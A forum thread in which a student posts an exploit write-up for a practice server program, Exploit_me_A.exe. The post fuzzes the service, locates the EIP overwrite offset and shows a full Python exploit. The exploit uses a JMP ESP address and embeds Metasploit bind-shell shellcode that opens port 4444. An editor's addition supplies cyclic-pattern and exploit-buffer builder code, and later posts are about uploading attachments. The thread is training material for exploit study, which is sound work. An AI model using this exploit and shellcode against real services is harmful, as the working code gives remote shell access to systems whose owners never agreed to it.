Post #2
Exploit_me_A.exe analysis report
Submitter's Kanxue (看雪) ID: hahar
Occupation (student, programmer, security expert, hacking enthusiast, other?): Student
1. PE analysis
From the introduction I knew the program is a server, so I ran it directly and used Process Explorer to check which port Exploit_me_A.exe is listening on, as shown in Figure 1:
The program listens on port 7777. Next I used a Python script to send a string of A's and see how the server reacts:
#!/usr/bin/env python
# Python 2: print statements and str payloads
import socket
host = "127.0.0.1"
port = 7777
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#print shellcode
print " Connecting to [%s:%d]" % (host, port)
s.connect((host, port))
# probe: a short run of A's to see whether the server echoes it back
buffer = "A" * 10
print " Sending [%s]" % buffer
s.send(buffer)
print " Closing socket"
s.close()
The server returned the data I sent, so I tentatively concluded it is an echo program: whatever you send in comes back.
2. Vulnerability description
With 10 A's the program did not overflow. Increasing the number of A's step by step, when it reached 1000 the cdb debugger reported an exception (note: cdb is included in the Windows Debugging Tools package; running cdb -iae sets cdb as the debugger that handles exceptions).
This shows the server program raises an exception when processing user input, i.e. it overflows; the debugger shows execution at 41414141, clearly the A's we sent. The next step is to pinpoint the overflow offset precisely. One can bisect (testing lengths 500, 250 and 125 in turn) or locate the hundreds, tens and ones digits one at a time. I used the second method.
Modify the Python program:
buffer = ""
li = ["A","B","C","D","E","F","G","H","I","J"]
for ch in li:
    buffer += ch * 100
The result shows the character "C" overwrote EIP, so the overflow length is between 200 and 300. Next, locate the tens digit:
buffer = "a" * 200
li = ["A","B","C","D","E","F","G","H","I","J"]
for ch in li:
    buffer += ch * 10
The debugger shows the character A overwrote EIP, so the overwrite length is between 200 and 210. The ones digit is located the same way:
buffer = "a" * 200
li = ["A","B","C","D","E","F","G","H","I","J"]
for ch in li:
    buffer += ch * 1
The result shows bytes 201 to 204 overwrote EIP. Now the exploit can be constructed.
Buffer = A*200 + JMPESP + NOP*20 + Shellcode
I used 20 NOPs here; in fact it only needs to be more than the number subtracted when the function returns, and NOP instructions do not affect shellcode execution. For JMPESP I used the address that works across Chinese-language platforms, JMPESP = "\x12\x45\xFA\x7F".
3. Shellcode function
I'm a lazy person, so I generated it directly on the http://metasploit.com:55555/PAYLOADS?FILTER=win32 site.
I chose windows bind shell, producing a shellcode that listens on port 4444.
4. Stability and portability
Since the JMPESP address used by the program applies to all Chinese-language operating systems, and the shellcode locates API addresses dynamically, it has good stability and portability.
5. Screenshot of the exploit running successfully
You can see port 4444 is listening.
6. Exploit
#!/usr/bin/env python
import socket
host = "127.0.0.1"
port = 7777
JMPESP = "\x12\x45\xFA\x7F"
# bind shell listening on port 4444
shellcode="\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xbe"
shellcode+="\x6b\xb2\x91\x83\xeb\xfc\xe2\xf4\x42\x01\x59\xdc\x56\x92\x4d\x6e"
shellcode+="\x41\x0b\x39\xfd\x9a\x4f\x39\xd4\x82\xe0\xce\x94\xc6\x6a\x5d\x1a"
shellcode+="\xf1\x73\x39\xce\x9e\x6a\x59\xd8\x35\x5f\x39\x90\x50\x5a\x72\x08"
shellcode+="\x12\xef\x72\xe5\xb9\xaa\x78\x9c\xbf\xa9\x59\x65\x85\x3f\x96\xb9"
shellcode+="\xcb\x8e\x39\xce\x9a\x6a\x59\xf7\x35\x67\xf9\x1a\xe1\x77\xb3\x7a"
shellcode+="\xbd\x47\x39\x18\xd2\x4f\xae\xf0\x7d\x5a\x69\xf5\x35\x28\x82\x1a"
shellcode+="\xfe\x67\x39\xe1\xa2\xc6\x39\xd1\xb6\x35\xda\x1f\xf0\x65\x5e\xc1"
shellcode+="\x41\xbd\xd4\xc2\xd8\x03\x81\xa3\xd6\x1c\xc1\xa3\xe1\x3f\x4d\x41"
shellcode+="\xd6\xa0\x5f\x6d\x85\x3b\x4d\x47\xe1\xe2\x57\xf7\x3f\x86\xba\x93"
shellcode+="\xeb\x01\xb0\x6e\x6e\x03\x6b\x98\x4b\xc6\xe5\x6e\x68\x38\xe1\xc2"
shellcode+="\xed\x38\xf1\xc2\xfd\x38\x4d\x41\xd8\x03\xa3\xcd\xd8\x38\x3b\x70"
shellcode+="\x2b\x03\x16\x8b\xce\xac\xe5\x6e\x68\x01\xa2\xc0\xeb\x94\x62\xf9"
shellcode+="\x1a\xc6\x9c\x78\xe9\x94\x64\xc2\xeb\x94\x62\xf9\x5b\x22\x34\xd8"
shellcode+="\xe9\x94\x64\xc1\xea\x3f\xe7\x6e\x6e\xf8\xda\x76\xc7\xad\xcb\xc6"
shellcode+="\x41\xbd\xe7\x6e\x6e\x0d\xd8\xf5\xd8\x03\xd1\xfc\x37\x8e\xd8\xc1"
shellcode+="\xe7\x42\x7e\x18\x59\x01\xf6\x18\x5c\x5a\x72\x62\x14\x95\xf0\xbc"
shellcode+="\x40\x29\x9e\x02\x33\x11\x8a\x3a\x15\xc0\xda\xe3\x40\xd8\xa4\x6e"
shellcode+="\xcb\x2f\x4d\x47\xe5\x3c\xe0\xc0\xef\x3a\xd8\x90\xef\x3a\xe7\xc0"
shellcode+="\x41\xbb\xda\x3c\x67\x6e\x7c\xc2\x41\xbd\xd8\x6e\x41\x5c\x4d\x41"
shellcode+="\x35\x3c\x4e\x12\x7a\x0f\x4d\x47\xec\x94\x62\xf9\x4e\xe1\xb6\xce"
shellcode+="\xed\x94\x64\x6e\x6e\x6b\xb2\x91"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#print shellcode
print " Connecting to [%s:%d]" % (host, port)
s.connect((host, port))
#buffer = "a"*200
#li = ["A","B","C","D","E","F","G","H","I","J"]
#for ch in li:
#    buffer += ch *1
#print buffer
buffer = "A" * 200 + JMPESP + "\x90" * 20 + shellcode
#buffer = "A" * 1000
print " Sending [%s]" % buffer
s.send(buffer)
print " Closing socket"
s.close()
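Added example (editor's addition, not code from hahar's post): the post finds the EIP offset in three rounds (hundreds, tens, ones). The same answer falls out of a single round if the probe is a cyclic pattern in which every 4-byte window is unique (the scheme Metasploit's pattern_create/pattern_offset use), and the little-endian EIP value shown by the debugger is looked up in that pattern. The block below does that, reproduces the post's digit probes for comparison, and builds the buffer with the post's layout (padding + JMP ESP address + NOP sled + shellcode). No server is contacted: simulated_eip() is a constructed stand-in for reading EIP in cdb, and the assumed return-address offset of 200 is the post's measured value, not something derived here. The bad-character check on the return address (NUL only) is an assumed caveat, not something the post established.

```python
#!/usr/bin/env python3
"""Offset location and buffer layout for the overflow described in the post.

Added example, not code from the original post. Assumptions: 32-bit x86
(4-byte little-endian saved return address), the post's offset of 200, and
NUL as the only bad character.
"""
import string
import struct


def digit_probe(prefix_len, step):
    """One of the post's probe buffers: prefix_len filler bytes, then ten runs
    A..J of `step` bytes each (step = 100, 10, 1 in the post)."""
    return b"a" * prefix_len + b"".join(c.encode() * step for c in "ABCDEFGHIJ")


def cyclic_pattern(length):
    """Pattern Aa0Aa1...Zz9: every 4-byte window is unique within the first
    26*26*10*3 = 20280 bytes, so one send is enough to find the offset."""
    if length > 20280:
        raise ValueError("pattern longer than 20280 bytes would repeat")
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(pattern, eip):
    """eip is the value as the debugger prints it (e.g. 0x41414141). The saved
    return address is stored little-endian, so pack it that way before searching."""
    idx = pattern.find(struct.pack("<I", eip))
    if idx < 0:
        raise ValueError("EIP value %#x is not in the pattern" % eip)
    return idx


def simulated_eip(sent, ret_offset=200):
    """Constructed stand-in for the debugger: the 4 bytes of `sent` that land on
    the saved return address come back as the faulting EIP. ret_offset=200 is
    the post's measured value (bytes 201-204), assumed here, not derived."""
    return struct.unpack("<I", sent[ret_offset:ret_offset + 4])[0]


def build_exploit(offset, ret_addr, shellcode, nop_count=20, bad_chars=b"\x00"):
    """Padding up to the saved return address, the JMP ESP address (little-endian),
    a NOP sled, then the payload. Rejects a return address containing a byte the
    transport is assumed to truncate on (NUL, as for a C-string copy)."""
    ret = struct.pack("<I", ret_addr)
    if any(b in ret for b in bad_chars):
        raise ValueError("return address %#x contains a bad character" % ret_addr)
    return b"A" * offset + ret + b"\x90" * nop_count + shellcode


if __name__ == "__main__":
    # One-round offset location against the simulated crash.
    pat = cyclic_pattern(1000)
    eip = simulated_eip(pat)
    off = pattern_offset(pat, eip)
    print("EIP = %#010x -> offset %d" % (eip, off))
    # The post's three probes; the letter that shows up in EIP gives each digit.
    print(digit_probe(0, 100)[:12], digit_probe(200, 10)[198:212], digit_probe(200, 1)[198:212])
    # Same layout as the post: "A"*200 + JMPESP + NOP*20 + shellcode (payload stubbed with int3).
    buf = build_exploit(off, 0x7FFA4512, b"\xcc" * 4)
    print(buf[off:off + 4].hex(), len(buf))
```

The address 0x7FFA4512 is the one the post uses; build_exploit packs it as "\x12\x45\xfa\x7f", the byte order the post writes by hand. Against a real target the pattern would be sent with the socket code from the post and the EIP value copied from cdb into pattern_offset.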
Post #3
There is no attachment upload function; pictures and Word documents cannot be submitted.
Post #4
Click Reply to Thread, then click Manage Attachments, and you can upload attachments.
For inserting images, refer to this thread:
http://bbs.pediy.com/showpost.php?postid=292659
Post #5
Post #6
support it.